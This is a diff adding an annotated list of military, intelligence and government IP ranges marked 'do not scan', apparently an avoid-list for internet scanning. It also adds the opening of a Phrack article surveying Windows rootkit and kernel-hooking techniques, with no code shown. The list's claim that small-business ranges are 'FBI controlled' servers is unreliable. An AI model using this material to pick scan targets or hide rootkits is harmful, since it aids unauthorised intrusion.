+147.169.0.0 HQ, 5th Signal Command
+147.198.0.0 Army Information Systems Command
+147.199.0.0 Army Information Systems Command
+147.238.0.0 Army Information Systems Command
+147.239.0.0 1112th Signal Battalion
+147.240.0.0 US Army Tank-Automotive Command
+147.242.0.0 19th Support Command
+147.248.0.0 Fort Monroe DOIM
+147.254.0.0 7th Communications Group
+
+RANGE 148
+148.114.0.0 NASA, Stennis Space Center
+
+RANGE 150
+150.113.0.0 1114th Signal Battalion
+150.114.0.0 1114th Signal Battalion
+150.125.0.0 Space and Naval Warfare Command
+150.133.0.0 10th Area Support Group
+150.144.0.0 NASA Goodard Space Flight Center
+150.149.0.0 Army Information Systems Command
+150.157.0.0 USAISC-Fort Lee
+150.184.0.0 Fort Monroe DOIM
+150.190.0.0 USAISC-Letterkenny
+150.196.0.0 USAISC-LABCOM
+
+RANGE 152
+152.82.0.0 7th Communications Group of the Air Force
+152.151.0.0 U.S. Naval Space & Naval Warfare Systems Command
+152.152.0.0 NATO Headquarters
+152.154.0.0 Defense Information Systems Agency
+152.229.0.0 Defense MegaCenter (DMC) Denver
+
+RANGE 153
+153.21.0.0 USCENTAF/SCM
+153.22.0.0 USCENTAF/SCM
+153.23.0.0 USCENTAF/SCM
+153.24.0.0 USCENTAF/SCM
+153.25.0.0 USCENTAF/SCM
+153.26.0.0 USCENTAF/SCM
+153.27.0.0 USCENTAF/SCM
+153.28.0.0 USCENTAF/SCM
+153.29.0.0 USCENTAF/SCM
+153.30.0.0 USCENTAF/SCM
+153.31.0.0 Federal Bureau of Investigation
+
+RANGE 155
+155.5.0.0 1141st Signal Bn
+155.6.0.0 1141st Signal Bn
+155.7.0.0 American Forces Information
+155.8.0.0 U.S. ArmyFort Gordon
+155.9.0.0 - 155.9.255.255 United States Army Information Systems Command
+155.74.0.0 PEO STAMIS
+155.75.0.0 US Army Corps of Engineers
+155.76.0.0 PEO STAMIS
+155.77.0.0 PEO STAMIS
+155.78.0.0 PEO STAMIS
+155.79.0.0 US Army Corps of Engineers
+155.80.0.0 PEO STAMIS
+155.81.0.0 PEO STAMIS
+155.82.0.0 PEO STAMIS
+155.83.0.0 US Army Corps of Enginers
+155.84.0.0 PEO STAMIS
+155.85.0.0 PEO STAMIS
+155.86.0.0 US Army Corps of Engineers
+155.87.0.0 PEO STAMIS
+155.88.0.0 PEO STAMIS
+155.96.0.0 Drug Enforcement Administration
+155.149.0.0 1112th Signal Battalion
+155.155.0.0 HQ, 5th Signal Command
+155.178.0.0 Federal Aviation Administration
+155.213.0.0 USAISC Fort Benning
+155.214.0.0 Director of Information Management
+155.215.0.0 USAISC-FT DRUM
+155.216.0.0 TCACCIS Project Management Office
+155.217.0.0 Directorate of Information Management
+155.218.0.0 USAISC
+155.219.0.0 DOIM/USAISC Fort Sill
+155.220.0.0 USAISC-DOIM
+155.221.0.0 USAISC-Ft Ord
+
+RANGE 156
+156.9.0.0 U. S. Marshals Service
+
+RANGE 157
+157.150.0.0 United Nations
+157.153.0.0 COMMANDER NAVAL SURFACE U.S. PACIFIC FLEET
+157.202.0.0 US Special Operations Command
+157.217.0.0 U. S. Strategic Command
+
+RANGE 158
+158.1.0.0 Commander, Tooele Army Depot
+158.2.0.0 USAMC Logistics Support Activity
+158.3.0.0 U.S. Army TACOM
+158.4.0.0 UASISC Ft. Carson
+158.5.0.0 1112th Signal Battalion
+158.6.0.0 USAISC-Ft. McCoy
+158.7.0.0 USAISC-FLW
+158.8.0.0 US Army Soldier Support Center
+158.9.0.0 USAISC-CECOM
+158.10.0.0 GOC
+158.11.0.0 UASISC-Vint Hill
+158.12.0.0 US Army Harry Diamond Laboratories
+158.13.0.0 USAISC DOIM
+158.14.0.0 1112th Signal Battalion
+158.15.0.0 - 158.15.255.255 Defense Megacenter Huntsville
+158.16.0.0 Rocky Mountain Arsenal (PMRMA)
+158.17.0.0 Crane Army Ammunition Activity
+158.18.0.0 Defense Finance & Accounting Service Center
+158.19.0.0 DOIM
+158.20.0.0 DOIM
+158.235.0.0 Marine Corps Central Design and Programming Activity
+158.243.0.0 Marine Corps Central Design and Programming Activity
+158.244.0.0 Marine Corps Central Design and Programming Activity
+158.245.0.0 Marine Corps Central Design and Programming Activity
+158.246.0.0 Marine Corps Central Design and Programming Activity
+
+RANGE 159
+159.120.0.0 Naval Air Systems Command (Air 4114)
+
+RANGE 160
+160.132.0.0 US Army Recruiting Command
+160.135.0.0 36th Signal BN
+160.138.0.0 USAISC
+160.139.0.0 USAISC
+160.140.0.0 HQ, United States Army
+160.143.0.0 USAISC
+160.145.0.0 1101st Signal Brigade
+160.146.0.0 USAISC SATCOMSTA-CAMP ROBERTS
+160.150.0.0 Commander, Moncrief Army Hospital
+
+RANGE 161
+161.124.0.0 NAVAL WEAPONS STATION
+
+RANGE 162
+162.32.0.0 Naval Aviation Depot Pensacola
+162.45.0.0 Central Intelligence Agency
+162.46.0.0 Central Intelligence Agency
+
+RANGE 163
+163.205.0.0 NASA Kennedy Space Center
+163.206.0.0 NASA Kennedy Space Center
+
+RANGE 164
+164.45.0.0 Naval Ordnance Center, Pacific Division
+164.49.0.0 United States Army Space and Strategic Defense
+164.158.0.0 Naval Surface Warfare Center
+164.217.0.0 Institute for Defense Analyses
+164.218.0.0 Bureau of Naval Personnel
+164.219.0.0 HQ USAFE WARRIOR PREPARATION CENTER
+164.220.0.0 - 164.220.255.255 NIMIP/TIP/NEWNET
+164.221.0.0 - 164.221.255.255 Information Technology
+164.223.0.0 Naval Undersea Warfare Center
+164.224.0.0 Secretary of the Navy
+164.225.0.0 U.S. Army Intelligence and Security Command
+164.226.0.0 Naval Exchange Service Command
+164.227.0.0 Naval Surface Warfare Center, Crane Division
+164.228.0.0 USCINCPAC J21T
+164.229.0.0 NCTS-NOLA
+164.230.0.0 Naval Aviation Depot
+164.231.0.0 Military Sealift Command
+164.232.0.0 - 164.232.255.255 United States Southern Command
+
+RANGE 167
+167.44.0.0 Government Telecommunications Agency
+
+RANGE 168
+168.68.0.0 USDA Office of Operations
+168.85.0.0 Fort Sanders Alliance
+168.102.0.0 Indiana Purdue Fort Wayne
+
+RANGE 169
+169.252.0.0 - 169.253.0.0 U.S. Department of State
+
+RANGE 194
+
+RANGE 195
+195.10.* Various - Do not scan
+
+RANGE 199
+199.121.4.0 - 199.121.253.0 Naval Air Systems Command, VA
+
+RANGE 203
+203.59.0.0 - 203.59.255.255 Perth Australia iiNET
+
+RANGE 204
+204.34.0.0 - 204.34.15.0 IPC JAPAN
+204.34.0.0 - 204.37.255.0 DOD Network Information Center
+204.34.16.0 - 204.34.27.0 Bureau of Medicine and Surgery
+204.34.32.0 - 204.34.63.0 USACOM
+204.34.64.0 - 204.34.115.0 DEFENSE FINANCE AND ACCOUNTING SERVICE
+204.34.128.0 DISA-Eucom / BBN-STD, Inc.
+204.34.129.0 Defense Technical Information Center
+204.34.130.0 GSI
+204.34.131.0 NSA NAPLES ITALY
+204.34.132.0 NAVSTA ROTA SPAIN
+204.34.133.0 NAS SIGONELLA ITALY
+204.34.134.0 Naval Air Warfare Center Aircraft Division
+204.34.135.0 GSI
+204.34.136.0 Naval Undersea Warfare Center USRD - Orlando
+204.34.137.0 Joint Spectrum Center
+204.34.138.0 GSI
+204.34.139.0 HQ, JFMO Korea, Headquarters
+204.34.140.0 DISA D75
+204.34.141.0 U. S. Naval Air Facility, Atsugi Japan
+204.34.142.0 Naval Enlisted Personnel Management Center
+204.34.143.0 Afloat Training Group Pacific
+204.34.144.0 HQ Special Operations Command - Europe
+204.34.145.0 Commander Naval Base Pearl Harbor
+204.34.147.0 NAVSEA Information Management Improvement Program
+204.34.148.0 Q112
+204.34.149.0 Ctr. for Info. Sys.Security,CounterMeasures
+204.34.150.0 Resource Consultants, Inc.
+204.34.151.0 Personnel Support Activity, San Diego
+204.34.152.0 NAVAL AIR FACILITY, ADAK
+204.34.153.0 NAVSEA Logistics Command Detachment
+204.34.154.0 PEARL HARBOR NAVAL SHIPYARD
+204.34.155.0 PEARL HARBOR NAVAL SHIPYARD
+204.34.156.0 Defense Photography School
+204.34.157.0 - 204.34.160.0 Defense Information School
+204.34.161.0 Naval Air Systems Command
+204.34.162.0 Puget Sound Naval Shipyard
+204.34.163.0 Joint Precision Strike Demonstration
+204.34.164.0 Naval Pacific Meteorology and Ocean
+204.34.165.0 Joint Precision Strike Demonstration
+204.34.167.0 USAF
+204.34.168.0 Commander
+204.34.169.0 Naval Air Warfare Center
+204.34.170.0 Naval Air Systems Command
+204.34.171.0 NAVSTA SUPPLY DEPARTMENT
+204.34.173.0 SUBMEPP Activity
+204.34.174.0 COMMANDER TASK FORCE 74 YOKOSUKA JAPAN
+204.34.176.0 DISA-PAC,IPC-GUAM
+204.34.177.0 Satellite Production Test Center
+204.34.181.0 940 Air Refueling Wing
+204.34.182.0 Defense Megacenter Warner Robins
+204.34.183.0 GCCS Support Facility
+204.34.184.0 Nav Air Tech Serv Facility-Detachment
+204.34.185.0 NAVAL SUPPORT FACILITY, DIEGO GARCIA
+204.34.186.0 Defense Logistics Agency - Europe
+204.34.187.0 NAVMASSO
+204.34.188.0 Commander-In-Chief, US Pacific Fleet
+204.34.189.0 Defense MegaCenter - St Louis
+204.34.190.0 NAVMASSO
+204.34.192.0 HQ SOCEUR
+204.34.193.0 Second Marine Expeditionary Force
+204.34.194.0 Second Marine Expeditionary Force
+204.34.195.0 Second Marine Expeditionary Force
+204.34.196.0 NAVCOMTELSTAWASHDC
+204.34.197.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
+204.34.198.0 Naval Observatory Detachment, Colorado
+204.34.199.0 NAVILCODETMECH
+204.34.200.0 Navy Environmental Preventive Medicine
+204.34.201.0 Port Hueneme Division, Naval Surf
+204.34.202.0 Naval Facilities Engineering Housing
+204.34.203.0 NAVSEA Logistics Command Detachment
+204.34.204.0 Naval Air Warfare Center
+204.34.205.0 Portsmouth Naval Shipyard
+204.34.206.0 INFORMATION SYSTEMS TECHNOLOGY CENTER
+204.34.208.0 - 204.34.210.0 Military Sealift Command Pacific
+204.34.211.0 USAF Academy
+204.34.212.0 3rd Combat Service Support
+204.34.213.0 1st Radio Battalion
+204.34.214.0 OASD (Health Affairs)
+204.34.215.0 Second Marine Expeditionary Force
+204.34.216.0 1st Marine Air Wing
+204.34.217.0 SA-ALC/LTE
+204.34.218.0 3rd Marine
+204.34.219.0 Communications and Electronics
+204.34.220.0 G-6 Operations
+204.34.221.0 G-6 Operations
+204.34.222.0 G-6 Operations
+204.34.223.0 G-6 Operations
+204.34.224.0 G-6 Operations
+204.34.225.0 Joint Interoperability Test Command
+204.34.226.0 NAVMASSO
+204.34.227.0 NAVMASSO
+204.34.228.0 - 204.34.228.255 Field Command Defense Nuclear Agency
+204.34.229.0 Naval Space Command
+204.34.230.0 Naval Pacific Meteorology and Oceanography
+204.34.232.0 Military Family Housing
+204.34.233.0 - 204.34.233.255 Navy Material Transportation Office
+204.34.234.0 NAVMASSO
+204.34.235.0 Defense Finance and Accounting Service
+204.34.237.0 European Stars and Stripes
+204.34.238.0 Pacific Stars and Stripes
+204.34.239.0 PUGET SOUND NAVAL SHIPYARD
+204.34.240.0 Nval Station, Guantanamo Bay
+204.34.242.0 COMNAVSURFPAC
+204.34.243.0 NAVMASSO
+204.34.244.0 Amphibious Force, Seventh Fleet, U. S. Navy
+204.34.245.0 USAF SpaceCommand
+204.34.246.0 USAF
+204.34.247.0 U.S. Army Special Operations Command
+204.34.248.0 FLEET COMBAT TRAINING CENTER ATLA
+204.34.249.0 Naval Aviation Depot North Island
+204.34.250.0 NAVMASSO
+204.34.251.0 NAVSEA Log Command Detachment Pacific
+204.34.252.0 Command Special Boat Squadron One
+204.34.253.0 AFPCA/GNNN
+204.34.254.0 Navy Environmental Preventive Medicine
+
+RANGE 205
+205.0.0.0 - 205.117.255.0 Department of the Navy, Space and Naval
+Warfare System Command, Washington DC - SPAWAR
+205.96.* - 205.103.*
+
+RANGE 207
+207.30.* Sprint/United Telephone of Florida
+
+All the below are FBI controlled Linux servers & IPs/IP-Ranges
+
+207.60.0.0 - 207.60.255.0 The Internet Access Company
+207.60.2.128 - 207.60.2.255 Abacus Technology
+207.60.3.0 - 207.60.3.127 Mass Electric Construction Co.
+207.60.3.128 - 207.60.3.255 Peabody Proberties Inc
+207.60.4.0 - 207.60.4.127 Northern Electronics
+207.60.4.128 - 207.60.4.255 Posternak, Blankstein & Lund
+207.60.5.64 - 207.60.5.127 Woodard & Curran
+207.60.5.192 - 207.60.5.255 On Line Services
+207.60.6.0 - 207.60.6.63 The 400 Group
+207.60.6.64 - 207.60.6.127 RD Hunter and Company
+207.60.6.128 - 207.60.6.191 Louis Berger and Associates
+207.60.6.192 - 207.60.6.255 Ross-Simons
+207.60.7.0 - 207.60.7.63 Eastern Cambridge Savings Bank
+207.60.7.64 - 207.60.7.127 Greater Lawrence Community Action Committee
+207.60.7.128 - 207.60.7.191 Data Electronic Devices, Inc
+207.60.8.0 - 207.60.8.255 Sippican
+207.60.9.0 - 207.60.9.31 Alps Sportswear Mfg Co
+207.60.9.32 - 207.60.9.63 Escher Group Ltd
+207.60.9.64 - 207.60.9.95 West Suburban Elder
+207.60.9.96 - 207.60.9.127 Central Bank
+207.60.9.128 - 207.60.9.159 Danick Systems
+207.60.9.160 - 207.60.9.191 Alps Sportswear Mfg CO
+207.60.9.192 - 207.60.9.223 BSCC
+207.60.13.16 - 207.60.13.23 Patrons Insurance Group
+207.60.13.40 - 207.60.13.47 Athera Technologies
+207.60.13.48 - 207.60.13.55 Service Edge Partners Inc
+207.60.13.56 - 207.60.13.63 Massachusetts Credit Union League
+207.60.13.64 - 207.60.13.71 SierraCom
+207.60.13.72 - 207.60.13.79 AI/ FOCS
+207.60.13.80 - 207.60.13.87 Extreme soft
+207.60.13.96 - 207.60.13.103 Eaton Seo Corp
+207.60.13.112 - 207.60.13.119 C. White
+207.60.13.120 - 207.60.13.127 Athera
+207.60.13.128 - 207.60.13.135 Entropic Systems, INC
+207.60.13.136 - 207.60.13.143 Wood Product Manufactureds Associates
+207.60.13.160 - 207.60.13.167 Jamestown Distribution
+207.60.13.168 - 207.60.13.175 C&M Computers
+207.60.13.176 - 207.60.13.183 ABC Used Auto Parts
+207.60.13.184 - 207.60.13.191 Tomas Weldon
+207.60.13.192 - 207.60.13.199 Tage Inns
+207.60.13.200 - 207.60.13.207 Control Module Inc
+207.60.13.208 - 207.60.13.215 Hyper Crawler Information Systems
+207.60.13.216 - 207.60.13.223 Eastern Bearings
+207.60.13.224 - 207.60.13.231 North Shore Data Services
+207.60.13.232 - 207.60.13.239 Mas New Hampshire
+207.60.14.0 - 207.60.14.255 J. A. Webster
+207.60.15.0 - 207.60.15.127 Trilogic
+207.60.16.0 - 207.60.16.255 Area 54
+207.60.18.0 - 207.60.18.63 Vested Development Inc
+207.60.18.64 - 207.60.18.127 Conventures
+207.60.21.0 - 207.60.21.255 Don Law Company
+207.60.22.0 - 207.60.22.255 Advanced Microsensors
+207.60.28.0 - 207.60.28.63 Applied Business Center
+207.60.28.64 - 207.60.28.127 Color and Design Exchange
+207.60.36.8 - 207.60.36.15 Shaun McCusker
+207.60.36.16 - 207.60.36.23 Town of Framingham
+207.60.36.24 - 207.60.36.31 AB Software
+207.60.36.32 - 207.60.36.39 Seabass Dreams Too Much, Inc
+207.60.36.40 - 207.60.36.47 Next Ticketing
+207.60.36.48 - 207.60.36.55 Dulsi
+207.60.36.56 - 207.60.36.63 The Internet Access Company
+207.60.36.64 - 207.60.36.71 Maguire Group
+207.60.36.72 - 207.60.36.79 Cogenex
+207.60.36.88 - 207.60.36.95 AKNDC
+207.60.36.96 - 207.60.36.103 McGovern election commitee
+207.60.36.104 - 207.60.36.111 Digital Equipment Corp
+207.60.36.112 - 207.60.36.119 PTR - Precision Technologies
+207.60.36.120 - 207.60.36.127 Extech
+207.60.36.128 - 207.60.36.135 Manfreddi Architects
+207.60.36.144 - 207.60.36.151 Parent Naffah
+207.60.36.152 - 207.60.36.159 Darling Dolls Inc
+207.60.36.160 - 207.60.36.167 Wright Communications
+207.60.36.168 - 207.60.36.175 Principle Software
+207.60.36.176 - 207.60.36.183 Chris Pet Store
+207.60.36.184 - 207.60.36.191 Fifteen Lilies
+207.60.36.192 - 207.60.36.199 All-Com Technologies
+207.60.37.0 - 207.60.37.31 Cardio Thoracic Surgical Associates, P. A.
+207.60.37.32 - 207.60.37.63 Preferred Fixtures Inc
+207.60.37.64 - 207.60.37.95 Apple and Eve Distributors
+207.60.37.96 - 207.60.37.127 Nelson Copy Supply
+207.60.37.128 - 207.60.37.159 Boston Optical Fiber
+207.60.37.192 - 207.60.37.223 Fantasia&Company
+207.60.41.0 - 207.60.41.255 Infoactive
+207.60.48.0 - 207.60.48.255 Curry College
+207.60.62.32 - 207.60.62.63 Alternate Power Source
+207.60.62.64 - 207.60.62.95 Keystone Howley-White
+207.60.62.128 - 207.60.62.159 Bridgehead Associates LTD
+207.60.62.160 - 207.60.62.191 County Supply
+207.60.62.192 - 207.60.62.223 NH Board of Nursing
+207.60.64.0 - 207.60.64.63 Diversified Wireless Technologies
+207.60.64.64 - 207.60.64.127 Phytera
+207.60.66.0 - 207.60.66.15 The Network Connection
+207.60.66.16 - 207.60.66.31 Young Refrigeration
+207.60.66.32 - 207.60.66.47 Vision Appraisal Technology
+207.60.66.48 - 207.60.66.63 EffNet Inc
+207.60.66.64 - 207.60.66.79 Entropic Systems Inc
+207.60.66.80 - 207.60.66.95 Finley Properties
+207.60.66.96 - 207.60.66.111 Nancy Plowman Associates
+207.60.66.112 - 207.60.66.127 Northeast Financial Strategies
+207.60.66.128 - 207.60.66.143 Textnology Corp
+207.60.66.144 - 207.60.66.159 Groton Neochem LLC
+207.60.66.160 - 207.60.66.175 Tab Computers
+207.60.66.176 - 207.60.66.191 Patrons Insurance
+207.60.66.192 - 207.60.66.207 Chair City Web
+207.60.66.208 - 207.60.66.223 Radex, Inc.
+207.60.66.224 - 207.60.66.239 Robert Austein
+207.60.66.240 - 207.60.66.255 Hologic Inc.
+207.60.71.64 - 207.60.71.127 K-Tech International Inc.
+207.60.71.128 - 207.60.71.191 Pan Communications
+207.60.71.192 - 207.60.71.255 New England College of Finance
+207.60.75.128 - 207.60.75.255 Absolve Technology
+207.60.78.0 - 207.60.78.127 Extech
+207.60.78.128 - 207.60.78.255 The Insight Group
+207.60.83.0 - 207.60.83.255 JLM Technologies
+207.60.84.0 - 207.60.84.255 Strategic Solutions
+207.60.94.0 - 207.60.94.15 McWorks
+207.60.94.32 - 207.60.94.47 Rooney RealEstate
+207.60.94.48 - 207.60.94.63 Joseph Limo Service
+207.60.94.64 - 207.60.94.79 The Portico Group
+207.60.94.80 - 207.60.94.95 Event Travel Management Inc
+207.60.94.96 - 207.60.94.111 Intellitech International
+207.60.94.128 - 207.60.94.143 Orion Partners
+207.60.94.144 - 207.60.94.159 Rainbow Software Solution
+207.60.94.160 - 207.60.94.175 Grason Stadler Inc
+207.60.94.192 - 207.60.94.207 Donnegan System
+207.60.95.1 - 207.60.95.255 The Iprax Corp
+207.60.102.0 - 207.60.102.63 Coporate IT
+207.60.102.64 - 207.60.102.127 Putnam Technologies
+207.60.102.128 - 207.60.102.191 Sycamore Networks
+207.60.102.192 - 207.60.102.255 Bostek
+2?7.6?.10?.128 - 207.60.103.255 Louis Berger and Associates
+207.60.104.128 - 207.60.104.191 Hanson Data Systems
+207.60.106.128 - 207.60.106.255 Giganet Inc.
+207.60.107.0 - 207.60.107.255 Roll Systems
+207.60.108.8 - 207.60.108.15 InternetQA
+207.60.111.0 - 207.60.111.31 Reading Cooperative Bank
+207.60.111.32 - 207.60.111.63 Edco collaborative
+207.60.111.64 - 207.60.111.95 DTC Communications Inc
+207.60.111.96 - 207.60.111.127 Mike Line
+207.60.111.128 - 207.60.111.159 The Steppingstone Foundation
+207.60.111.160 - 207.60.111.191 Caton Connector
+207.60.111.192 - 207.60.111.223 Refron
+207.60.111.224 - 207.60.111.255 Dolabany Comm Group
+207.60.112.0 - 207.60.112.255 The CCS Companies
+207.60.116.0 - 207.60.116.255 Continental PET Technologies
+207.60.122.16 - 207.60.122.23 Corey & Company Designers Inc
+207.60.122.24 - 207.60.122.31 SAIC
+207.60.122.32 - 207.60.122.39 Netserve Entertainment Group
+207.60.122.40 - 207.60.122.47 Avici Systems Inc
+207.60.122.48 - 207.60.122.55 Webrdwne
+207.60.122.56 - 207.60.122.63 Reality and Wonder
+207.60.122.64 - 207.60.122.71 Nishan Desilva
+207.60.122.72 - 207.60.122.79 NemaSoft Inc
+207.60.122.80 - 207.60.122.87 Patrick Murphy
+207.60.122.88 - 207.60.122.95 Corey and Company
+207.60.122.96 - 207.60.122.103 Ames Textile Corp
+207.60.122.104 - 207.60.122.111 Publicom
+207.60.127.0 - Northstar Technologies
+207.60.128.0 - 207.60.128.255 Northstar Technologies
+207.60.129.0 - 207.60.129.255 Sanga Corp
+207.60.129.64 - 207.60.129.127 Fired Up Network
+207.60.129.128 - 207.60.129.191 Integrated Data Solutions
+207.60.129.192 - 207.60.129.255 Metanext
+207.61.* WorldLinx Telecommunications, Inc., Canada
+207.120.* BBN Planet, MA
+
+RANGE 208
+208.240.xxx.xxx
+
+RANGE 209
+209.35.* Interland, Inc., GA
+
+RANGE 212
+212.56.107.22
+212.143 *** israelis isp's!! dont try those ranges!!
+212.149.*** israelis isp's!! dont try those ranges!!
+212.159.0.2
+212.159.1.1
+212.159.1.4
+212.159.1.5
+212.159.0.2
+212.159.1.1
+212.159.1.4
+212.159.1.5
+212.159.33.56
+212.159.40.211
+212.159.41.173
+212.179.*** israelis isp's!! dont try those ranges!!
+212.208.0.12.*** israelis isp's!! dont try those ranges!!
+
+RANGE 213
+213.8.***.*** israelis isp's!! dont try those ranges!!
+
+RANGE 216
+216.25.* 216.94.***.*** 216.247.* 216.248.*.* 217
+217.6.* Do not scan
+
+--------------------------------
+
+And from our Canadian friends...
+
+192.139.201.0 - 192.139.201.24 : Government of Canada
+192.139.202.0 - 192.139.202.24 : Government of Canada
+192.139.203.0 - 192.139.203.24 : Government of Canada
+192.139.204.0 - 192.139.204.24 : Government of Canada
+192.197.83.0 - 192.197.83.24 : Government of Canada
+198.103.0.0 - 198.103.0.16 : Government of Canada
+
+128.43.0.0 - 128.43.0.16 : Canadian Department of National Defense (DND)
+131.132.0.0 - 131.132.0.16 : Canadian Department of National Defense (DND)
+131.133.0.0 - 131.133.0.16 : Canadian Department of National Defense (DND)
+131.134.0.0 - 131.134.0.16 : Canadian Department of National Defense (DND)
+131.135.0.0 - 131.135.0.16 : Canadian Department of National Defense (DND)
+131.136.0.0 - 131.136.0.16 : Canadian Department of National Defense (DND)
+131.137.0.0 - 131.137.0.16 : Canadian Department of National Defense (DND)
+131.138.0.0 - 131.138.0.16 : Canadian Department of National Defense (DND)
+131.139.0.0 - 131.139.0.16 : Canadian Department of National Defense (DND)
+131.140.0.0 - 131.140.0.16 : Canadian Department of National Defense (DND)
+131.141.0.0 - 131.141.0.16 : Canadian Department of National Defense (DND)
+192.5.144.0 - 192.5.144.24 : Canadian Department of National Defense (DND)
+192.12.98.0 - 192.12.98.24 : Canadian Department of National Defense (DND)
+192.12.215.0 - 192.12.215.24 : Canadian Department of National Defense
+(DND)
+192.16.205.0 - 192.16.205.24 : Canadian Department of National Defense
+(DND)
+192.16.206.0 - 192.16.206.24 : Canadian Department of National Defense
+(DND)
+192.16.207.0 - 192.16.207.24 : Canadian Department of National Defense
+(DND)
+192.16.208.0 - 192.16.208.24 : Canadian Department of National Defense
+(DND)
+192.16.242.0 - 192.16.242.24 : Canadian Department of National Defense
+(DND)
+192.16.243.0 - 192.16.243.24 : Canadian Department of National Defense
+(DND)
+192.35.144.0 - 192.35.144.24 : Canadian Department of National Defense
+(DND)
+192.42.68.0 - 192.42.68.24 : Canadian Department of National Defense (DND)
+
+
diff --git a/phrack65/4.txt b/phrack65/4.txt
new file mode 100644
index 0000000..7afe9d4
--- /dev/null
+++ b/phrack65/4.txt
@@ -0,0 +1,1827 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0c, Issue 0x41, Phile #0x04 of 0x0f
+
+|=-----------------------------------------------------------------------=|
+|=---=[ Stealth hooking : Another way to subvert the Windows kernel ]=---=|
+|=-----------------------------------------------------------------------=|
+|=--------------------=[ by mxatone and ivanlef0u ]=---------------------=|
+|=-----------------------------------------------------------------------=|
+
+                 
+1 - Introduction on anti-rookits technologies and bypass
+    1.1 - Rookits and anti-rootkits techniques
+    1.2 - About kernel level protections
+    1.3 - Concept key: use kernel code against itself
+    
+2 - Introducing stealth hooking on IDT.
+    2.1 - How Windows manage hardware interrupts 
+        2.1.1 - Hardware interrupts dispatching on Windows     
+        2.1.2 - Hooking hardware IT like a ninja
+        2.1.3 - Application 1 : Kernel keylogger
+        2.1.4 - Application 2 : NDIS incoming packets sniffer
+    2.2 - Conclusion about stealth hooking on IDT
+        
+3 - Owning NonPaged pool using stealth hooking
+    3.1 - Kernel allocation layout review
+        3.1.1 - Difference between Paged and NonPaged pool
+        3.1.2 - NonPaged pool tables
+        3.1.3 - Allocation and free algorithms
+    3.2 - Getting code execution abusing allocation code
+        3.2.1 - Data corruption of MmNonPagedPoolFreeListHead
+        3.2.2 - Expend it for every size
+    3.3 - Exploit our position
+        3.3.1 - Generic stack redirection
+        3.3.2 - Userland process code injection
+
+4 - Detection
+5 - Conclusion
+6 - References
+
+
+---[ 1 - Introduction on anti-rookits technologies and bypass
+    
+Nowadays rootkits and anti-rootkits are becoming more and more important
+into the IT security landscape. Loved by some, hated by others, rootkits 
+can be considered as the holy grail of backdoors : stealthy, little, 
+close to hardware, ingenious, vicious... Their control over a computer 
+locally or remotely make them the best choice for an attacker. 
+Anti-rootkits try to detect and eradicate those malicious programs. 
+Rk techniques and complexity are evolving fast and today developing a rk or
+anti-rk is a very hard mission. 
+
+This paper deals about rootkits on Windows platform. More precisely about
+new kind of hijacking techniques that can be applied to the Windows kernel.
+Readers are assumed to be aware about rootkits techniques on Windows.
+
+----[ 1.1 - Rootkits and anti-rootkits technics
+
+A rootkit hijacks an operating system's behavior. In order to achieve this
+task, it can simply modify the operating system's binaries but that's not 
+very stealthy. Most rk's use hooks on important functions and change theirs
+results. A basic hook redirects execution flow by changing function start 
+or a function pointer but there is no single way to hook a routine. The 
+most common example is the SSDT (System Service Descriptor Table), this 
+table contains the syscall list which is a set of functions pointers. If 
+you can modify a pointer in this table, you are able to control the 
+behavior of one function. That's an example of how rootkits proceed, 
+obviously there is a lot of critical areas that can be controlled by an 
+attacker.
+
+Anti-rootkits try to check those areas, but the task is very hard. Most of 
+the time, anti-rk software makes a comparison between the memory image of 
+the program and its binary on the disk or verify some function pointer 
+tables to see if something has changed.
+
+That's how the war between rk-makers and anti-rk-junkies began, trying 
+to find the best way, the best area, for hooking critical operating 
+system features. On Windows those following areas are often used by 
+rootkits :
+
+- SSDT (kernel syscalls table) and shadow SSDT (win32k syscall table) are 
+the simplest solution.
+
+- MSR (Model Specific Registers) can be modified by a rootkit. On Windows 
+the MSR_SYSENTER_EIP is used by the assembly instructions 'sysenter' to 
+enter into ring0 mode. Hijacking this MSR allow an attacker to control
+the system.
+
+- MajorFunctions are functions used by drivers for I/O processing with 
+others devices, hooking those functions can be useful for a rootkit.
+
+- IDT (Interrupt Descriptor Table) is table used by the system for 
+handling exceptions and interruptions. 
+
+Another kind of techniques has appeared. By accessing to the kernel 
+objects a rootkit can easily change information about processes, threads, 
+loaded modules and other stuff. Those techniques are called DKOM (Direct 
+Kernel Object Manipulation). For example, the Windows kernel maintains a 
+double linked list called PsActiveProcessList (EPROCESS structures) 
+containing information about running processes. Unlink one of them and 
+your process will disappear from process lists like task manager, whereas 
+the process is still running.
+
+To block those kernel objects modifications, anti-rk checks other 
+sections. For processes, they used to read the PspCidTable which 
+has a table of PID (Process IDentifier) and TID (Thread IDentifier).
+A comparison between this table and PsActiveProcessList shows hidden
+processes. Against those attacks anti-rk tools have to find others
+sections and tricks to detect altered objects.
+
+One of the first paper about Windows stealth was written by Holy Father, 
+"Invisibility on NT boxes" [1]. With this paper came one of the first 
+public implementations of a rootkit with a ring0 driver, Hacker 
+Defender [2], coded by Holy Father and Ratter of the famous VXing mag 29A 
+[3]. This driver was able to elevate process rights using token 
+manipulation. The rest of the rootkit uses user-land hooks to perform files
+and registry hiding, process infection with dll injection. A good example 
+of a full ring0 rootkit is NT Rootkit of Greg Hoglund [4], this driver uses
+SSDT hooks to perform stealth operation. It registers a Filter Device 
+Object above the NTFS file system and above the keyboard device for 
+filtering IRP (I/O Request Packets). It also provides a NDIS protocol 
+driver to hide communication on the network. Even if this rk was written 
+for NT 4.0 and Win2K it's a perfect example for beginners. 
+
+After came more advanced ring0 rk like FU [5], written by Fuzen_op and its
+improvement FUto published in the famous technical journal Uninformed [6].
+Vista improvement on driver verification introduces new rootkits mostly
+based on hardware features. Like BootRoot [7] and Pixie [8] by Eeye 
+loaded before any protection. Finally Joanna Rutkowska with her Blue 
+Pill [9] used virtualization technology to create layer between the 
+operating system and the hardware.
+
+In the wild the rk are used most of the time for lame mail spamming or 
+botnets. They often use old techniques but some of them are interesting 
+like Rustock [10] series or StormWorm [11] and the MBR rootkit [12]. They 
+implement a lot of tricks as ADS (Alternate Data Stream), code obfuscation,
+anti-debug, anti-VM or polymorphic code. The goal is not only subverting
+the kernel but also slow down their analysis and make them harder to
+defeat. 
+
+Even if the technology used by rootkits are more and more sophisticated, 
+the underground community is still developing POCs to improve current 
+techniques. Unreal [13] and AK992 [14] are both great examples. The first 
+uses an ADS and a NTFS MajorFunctions hooking to hide itself, the second 
+checks IRP completion when sended to disk's devices. You can find plenty 
